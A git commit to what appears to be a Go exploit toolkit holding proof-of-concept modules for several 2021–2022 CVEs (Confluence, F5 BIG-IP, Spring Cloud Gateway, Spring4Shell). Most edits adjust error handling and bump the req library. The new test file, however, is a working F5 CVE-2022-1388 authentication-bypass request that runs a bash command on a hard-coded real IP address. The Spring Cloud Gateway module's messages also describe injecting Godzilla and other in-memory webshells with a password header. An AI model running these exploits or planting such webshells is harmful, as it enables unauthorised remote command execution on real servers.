将req依赖更新到3.11.2版本彻底不会出现返回包nil问题

SummerSec · SummerSec · commit 692ecf4986a9 · 2022-05-12T21:24:23.000+08:00
diff --git a/cmd/commons/poc/2021/CVE-2021-26084.go b/cmd/commons/poc/2021/CVE-2021-26084.go
@@ -58,23 +58,16 @@ func (CVE202126084) init() {
 func (CVE202126084) SaveResult(target string, file string) {
 	err := utils.SaveToFile(target, file)
 	if err != nil {
+		log.Debugf("CVE-2021-26084 SaveResult error: %s", err)
 		return
 	}
 }
 
 func (CVE202126084) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
-	// 处理异常
-	defer func() {
-		if errs := recover(); errs != nil {
-			log.Debug(errs)
-		}
-	}()
-
 	if resp.IsSuccess() {
 		log.Debugf(resp.Dump())
 		return true
 	}
-
 	return false
 
 }
diff --git a/cmd/commons/poc/2022/CVE-2022-1388.go b/cmd/commons/poc/2022/CVE-2022-1388.go
@@ -92,12 +92,7 @@ func (CVE20221388) SaveResult(target string, file string) {
 }
 
 func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool {
-	defer func() {
-		if err := recover(); err != nil {
-			log.Error("[-] CheckExp error: ", err)
-		}
-	}()
-	res := resp.String()
+	res, _ := resp.ToString()
 	if res == "" {
 		return false
 	}
diff --git a/cmd/commons/poc/2022/CVE-2022-22947.go b/cmd/commons/poc/2022/CVE-2022-22947.go
@@ -149,7 +149,11 @@ func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[strin
 }
 
 func (CVE202222947) SaveResult(target, file string) {
-	context := target + " Successful exploitation CVE-2020-222947 " + target + "/?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell"
+	contexts := target + " Successful exploitation CVE-2020-222947 " + target + "/?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell"
 	log.Info("[*]: url: " + target + "哥斯拉内存马 密码和key pass key header添加sumsec头 or /?cmd=echo Result or add header X-CMD: echo Result  默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell")
-	utils.SaveToFile(context, file)
+	err := utils.SaveToFile(contexts, file)
+	if err != nil {
+		log.Error("[-] SaveResult error: ", err)
+		return
+	}
 }
diff --git a/cmd/commons/poc/2022/CVE-2022-22963.go b/cmd/commons/poc/2022/CVE-2022-22963.go
@@ -65,6 +65,8 @@ func (CVE202222963) SaveResult(target string, file string) {
 	contexts := target + "   存在CVE-2022-22963漏洞"
 	err := utils.SaveToFile(contexts, file)
 	if err != nil {
+		log.Debugf("[-] Save result failed")
+		log.Debugf(err.Error())
 		return
 	}
 }
diff --git a/cmd/commons/poc/2022/CVE-2022-22965.go b/cmd/commons/poc/2022/CVE-2022-22965.go
@@ -130,15 +130,8 @@ func (p CVE202222965) SaveResult(target string, file string) {
 }
 
 func (p CVE202222965) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {
-	defer func() {
-		if err := recover(); err != nil {
-			log.Error("[-] CheckExp error: ", err)
-		}
-	}()
-
 	if resp.IsSuccess() {
 		return true
 	}
-
 	return false
 }
diff --git a/cmd/commons/utils/httpclient.go b/cmd/commons/utils/httpclient.go
@@ -54,17 +54,11 @@ func Send(hashmap map[string]interface{}) (resp *req.Response) {
 
 	reqt := client.R().EnableDump()
 	reqs := SetRequest(reqt, headers, body.(string))
-	defer func() {
-		if err := recover(); err != nil {
-			log.Trace(err)
-		}
-	}()
 	resp, errs := reqs.Send(method, url)
 	if resp == nil || errs != nil {
 		log.Debug("requesting error: " + errs.Error())
-		return nil
+		return resp
 	}
-	log.Trace(resp.String())
 	log.Debugln("send request success")
 	return resp
 }
diff --git a/cmd/test/url.go b/cmd/test/url.go
@@ -1,5 +1,26 @@
 package main
 
+import (
+	"fmt"
+	"github.com/imroc/req/v3"
+)
+
 func main() {
+	url := "http://139.162.180.108:7500"
+	client := req.C()
+	client.SetTimeout(10 * 1000)
+	client.SetCommonRetryCount(3)
+	client.EnableInsecureSkipVerify()
+	headers := map[string]string{
+		"Host":       "localhost",
+		"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36",
+		//"Connection":      "keep-alive, x-f5-auTh-tOKen, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd,X-F5-New-Authtok-Reqd,X-Forwarded-Server,X-Forwarded-Host",
+		"Connection":      "keep-alive, x-f5-auTh-tOKen",
+		"Authorization":   "Basic YWRtaW46",
+		"X-F5-Auth-Token": "a",
+		"Content-Type":    "application/json",
+	}
+	resp, _ := client.R().SetHeadersNonCanonical(headers).SetBody("{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo SnZQYURpdk9lVQ== | base64 -d'\"}").Post(url + "/mgmt/tm/util/bash")
+	fmt.Println(resp.String())
 
 }
diff --git a/go.mod b/go.mod
@@ -5,7 +5,7 @@ go 1.13
 require (
 	github.com/corpix/uarand v0.1.1
 	github.com/fatih/structs v1.1.0
-	github.com/imroc/req/v3 v3.11.0
+	github.com/imroc/req/v3 v3.11.2
 	github.com/projectdiscovery/mapcidr v0.0.9
 	github.com/sirupsen/logrus v1.8.1
 	golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c // indirect
diff --git a/go.sum b/go.sum
@@ -51,6 +51,8 @@ github.com/hooklift/assert v0.1.0/go.mod h1:pfexfvIHnKCdjh6CkkIZv5ic6dQ6aU2jhKgh
 github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
 github.com/imroc/req/v3 v3.11.0 h1:s2+GYIdzd20i4bB1ZWncsRx+x7wcy3f6cpDIbR1P6ro=
 github.com/imroc/req/v3 v3.11.0/go.mod h1:G6fkq27P+JcTcgRVxecxY+amHN1xFl8W81eLCfJ151M=
+github.com/imroc/req/v3 v3.11.2 h1:21T0t1sZTJ04e0tMOEMmH3z66V3opRH8LO5lss3Sv3c=
+github.com/imroc/req/v3 v3.11.2/go.mod h1:G6fkq27P+JcTcgRVxecxY+amHN1xFl8W81eLCfJ151M=
 github.com/jmespath/go-jmespath v0.0.0-20180206201540-c2b33e8439af/go.mod h1:Nht3zPeWKUH0NzdCt2Blrr5ys8VGpn0CEB0cQHVjt7k=
 github.com/jpillora/backoff v0.0.0-20180909062703-3050d21c67d7/go.mod h1:2iMrUgbbvHEiQClaW2NsSzMyGHqN+rDFqY705q49KG0=
 github.com/json-iterator/go v1.1.10/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4=

Original file line number	Diff line number	Diff line change
`@@ -58,23 +58,16 @@ func (CVE202126084) init() {`
`58`	`58`	`func (CVE202126084) SaveResult(target string, file string) {`
`59`	`59`	`err := utils.SaveToFile(target, file)`
`60`	`60`	`if err != nil {`
	`61`	`+ log.Debugf("CVE-2021-26084 SaveResult error: %s", err)`
`61`	`62`	`return`
`62`	`63`	`}`
`63`	`64`	`}`
`64`	`65`
`65`	`66`	`func (CVE202126084) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {`
`66`		`- // 处理异常`
`67`		`- defer func() {`
`68`		`- if errs := recover(); errs != nil {`
`69`		`- log.Debug(errs)`
`70`		`- }`
`71`		`- }()`
`72`		`-`
`73`	`67`	`if resp.IsSuccess() {`
`74`	`68`	`log.Debugf(resp.Dump())`
`75`	`69`	`return true`
`76`	`70`	`}`
`77`		`-`
`78`	`71`	`return false`
`79`	`72`
`80`	`73`	`}`
Original file line number	Diff line number	Diff line change
`@@ -92,12 +92,7 @@ func (CVE20221388) SaveResult(target string, file string) {`
`92`	`92`	`}`
`93`	`93`
`94`	`94`	`func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool {`
`95`		`- defer func() {`
`96`		`- if err := recover(); err != nil {`
`97`		`- log.Error("[-] CheckExp error: ", err)`
`98`		`- }`
`99`		`- }()`
`100`		`- res := resp.String()`
	`95`	`+ res, _ := resp.ToString()`
`101`	`96`	`if res == "" {`
`102`	`97`	`return false`
`103`	`98`	`}`
Original file line number	Diff line number	Diff line change
`@@ -149,7 +149,11 @@ func (p CVE202222947) CheckExp(resp *req.Response, url string, hashmap map[strin`
`149`	`149`	`}`
`150`	`150`
`151`	`151`	`func (CVE202222947) SaveResult(target, file string) {`
`152`		`- context := target + " Successful exploitation CVE-2020-222947 " + target + "/?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell"`
	`152`	`+ contexts := target + " Successful exploitation CVE-2020-222947 " + target + "/?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell"`
`153`	`153`	`log.Info("[*]: url: " + target + "哥斯拉内存马密码和key pass key header添加sumsec头 or /?cmd=echo Result or add header X-CMD: echo Result 默认优先注入哥斯拉内存马、NettyMemshell、SpringRequestMappingMemshell")`
`154`		`- utils.SaveToFile(context, file)`
	`154`	`+ err := utils.SaveToFile(contexts, file)`
	`155`	`+ if err != nil {`
	`156`	`+ log.Error("[-] SaveResult error: ", err)`
	`157`	`+ return`
	`158`	`+ }`
`155`	`159`	`}`
Original file line number	Diff line number	Diff line change
`@@ -65,6 +65,8 @@ func (CVE202222963) SaveResult(target string, file string) {`
`65`	`65`	`contexts := target + " 存在CVE-2022-22963漏洞"`
`66`	`66`	`err := utils.SaveToFile(contexts, file)`
`67`	`67`	`if err != nil {`
	`68`	`+ log.Debugf("[-] Save result failed")`
	`69`	`+ log.Debugf(err.Error())`
`68`	`70`	`return`
`69`	`71`	`}`
`70`	`72`	`}`
Original file line number	Diff line number	Diff line change
`@@ -130,15 +130,8 @@ func (p CVE202222965) SaveResult(target string, file string) {`
`130`	`130`	`}`
`131`	`131`
`132`	`132`	`func (p CVE202222965) CheckExp(resp *req.Response, target string, hashmap map[string]interface{}) bool {`
`133`		`- defer func() {`
`134`		`- if err := recover(); err != nil {`
`135`		`- log.Error("[-] CheckExp error: ", err)`
`136`		`- }`
`137`		`- }()`
`138`		`-`
`139`	`133`	`if resp.IsSuccess() {`
`140`	`134`	`return true`
`141`	`135`	`}`
`142`		`-`
`143`	`136`	`return false`
`144`	`137`	`}`